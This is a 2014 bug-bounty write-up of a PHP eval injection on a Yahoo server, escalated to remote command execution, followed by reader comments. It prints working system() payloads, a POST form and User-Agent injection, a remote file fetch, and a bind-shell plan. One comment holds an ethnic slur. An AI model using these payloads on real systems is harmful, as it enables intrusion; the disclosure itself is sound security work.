Yahoo! Remote Command Execution Vulnerability.

facebooktwittergoogle_plusredditpinterestlinkedinmail

Yahoo-Hacked
Hello Everyone,

This is my first writeup for the blog, which I choose to be about “Yahoo Remote Code Execution” Vulnerability.

The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.

Vulnerability Link:

http://tw.user.mall.yahoo.com/rating/list?sid=$Vulnerability

Payload:

${@print(system(“whoami”))}

Note:

The server got many other Yahoo! sub-domains!

What is “Remote PHP Code Injection” ?

Simply, PHPCI occurs when user-supplied(GET/POST) values of the parameters are reflected inside eval() function, that vulnerability  allows attackers to execute PHP code such as system(“id”) or any other php function/code.

325673248_640

That said, I was able to inject PHP code by manuplating the value of the parameter “sid”.

In the beginning I tried to check the directories and files by “dir” using the SYSTEM function:
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“dir”))}

gedo1

Indeed I need a better view!, so I tried with system(“ls -la”) But!?
It didn’t work! it does not accept any spaces in the url!!

what Actually I need a good proof of concept to explain to Yahoo! Security Team how dangerous is this vulnerability, despite the number of Yahoo! sub-domains hosted on the same server.
So I tried to bypass that issue by some tricks including URL ENCODING the space with %20 but it didn’t work. Same result with double URL encoding!

e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“ls%20-la”))}

I also tried to go arround by using the function file_get_contents(“http://sec-down.com/poc.txt”) but this one dosen’t work because of the folder permissions, did you say do it in /tmp ?!

I thought of:

1- uploading “bind.sh” which is a bind connection script, into /tmp directory

2- Execute it to make a bind connection with the server

.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“./tmp/bind.sh”))}

3- Receive the connection from the server on Netcat and now I will be free to run whatever Commands :D

But actually Netcat is a Hacking tool! it also could be detected by any simple AV/IDS on the system! this could corrupt the whole thing!
I’ve to go for another solution.

Thanks to Ahmed Abul-Ela and Ibrahim Mosaad I was able to execute commands using system($_POST['x2'])

POC:

<form method=”POST” action=”http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_POST['x2']))}“>
<input type=”text” name=”x2″>
<input type=”submit”></form>

Also by using  system($_SERVER['HTTP_USER_AGENT']) and then inject my commands inside the userAgent.
.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_SERVER['HTTP_USER_AGENT']))}

Yea I know there have been other good tricks such as using readfile(“/etc/passwd”) and many more, despite the adrenaline I had, but as you know those ideas never come to mind when you need it :D

Sample POC for the Vulnerability [Allowed by Yahoo! to be public]:

TIMELINE:

Jan 20, 2014 at 6:39 PM – Intial Report to Yahoo! Security Team.

Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo! that server kernel was old one with a well known “Local Privilage Esclation” vulnerability which means an attacker with such vulnerability can gain ROOT ACCESS to the server!!!!

Jan 21, 2014 at 6:44 PM – Yahoo! Acknowledged the vulnerability and pushed a Fix for it.

fixed

Thanks to Yahoo! Security team for the fast fix release.

BTW No news about the bounty yet!

Follow me: twitter.com/zigoo0

This Post was Viewed (35625) times.

28 Comments

  1. Ahmed Sherif - January 26, 2014

    Thanks Ebrahem for the perfect article . and congratulation for hunting such as this bug ;)

  2. Salah - January 26, 2014

    Thanks for the writeup, nice catch by the way :)

  3. Ibrahim Raafat - January 26, 2014

    Congratulations for the website, and for this vulnerability discovery
    Quick response from Yahoo, And quick write up from you too :)
    Wish to see a new write up from you about RCE In Google

  4. Faris - January 26, 2014

    كالعاده يعم
    بتشغل العالم بـ
    XSS , SQL
    وتروح تلعب مع
    RCE
    ههههه
    قويه يا هيما بجد
    اما نشوف هيقدرو زى بتوع الفيس ولا هيبعتو لك تيشيرت غالى المره دى
    ب50$
    يهود ولاد تيت

  5. iD4rk - January 26, 2014

    Nice Hunt my friend (Y)
    And amazing write up

    keep up

  6. Abhi - January 26, 2014

    Its people like you who share their finding and continuosly help the community shine. Thanks ! :D nice catch btw

  7. BugsCollector.com - January 26, 2014

    Thanks! We added your bug to our world database of security holes: http://bugscollector.com/db/tw.user.mall.yahoo.com/95/
    You are welcome to add your different bugs to our db: http://bugscollector.com/add/

  8. Yahoo! Remote Command Execution Vulnerability |... - January 26, 2014

    […] This is my first writeup for the blog, which I choose to be about “Yahoo Remote Code Execution” Vulnerability. The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.  […]

  9. Mohamed Maati - January 26, 2014

    Nice Article Hima ….
    Congrats y s7bee

  10. Ebrahim Hegazy descubrió Código PHP vulnerabilidad de incrustación en Yahoo - | Noticias de seguridad informática, ¿qué es la seguridad informática? - January 26, 2014

    […] su entrada de blog , el parámetro sid podría haberse repercutido directamente a una función eval () que resulta . en […]

  11. Mennouchi Islam Azeddine - January 26, 2014

    Nice Job Bro.
    Nice Trick in the end =D

  12. Frank - January 26, 2014

    Great writeup!

    I’m curious, as someone interested in pen testing, your process for discovering the initial vulnerability. How did it occur for you to test the sid URL parameter w/ php code? Were you specifically testing Yahoo and tried all the parameters? Or were you using Yahoo and noticed something that hinted to this?

    Thanks!

  13. Zdalne wykonanie kodu na serwerze Yahoo | Zaufana Trzecia Strona - January 26, 2014

    […] dni temu opisywaliśmy przykład Facebooka, a dzisiaj egipski badacz ogłosił, że odkrył możliwość wykonania dowolnego polecenia na jednym z serwerów Yahoo. Błąd […]

  14. mst - January 27, 2014

    Good find Ebrahim ! Yahoo owes you a big bounty for this !

  15. mohamed wasel - January 28, 2014

    Congratulations for opening your website
    I wish you the best of luck
    keep going ya 7oby

  16. Ahmed Aboul-Ela - January 28, 2014

    awesome as usual my friend , keep it up :)

    • zigoo - January 29, 2014

      وانت مالك ياض, متدخلش المدونه دي تاني لحسن اجيبلك الواد بتاع احمد شيبه يظبطك :P

  17. zigoo - January 29, 2014

    @stefano
    @frank
    I will have my next post on Avira, the second post will be a step by step post on how I managed to find such vulnerability and some other types of vulnerabilities as well, please stay tuned :)

  18. Musab Mohamed @th3_pirate - January 30, 2014

    you are the best my frind .. keep going ^_^

  19. DayZ Hacks - January 30, 2014

    What’s up, just wanted to say, I loved this article.
    It was helpful. Keep on posting!

  20. William - February 2, 2014

    I’m often to running a blog and i really appreciate your content. The article has actually peaks my interest. I am going to bookmark your site and preserve checking for new information.

Leave a reply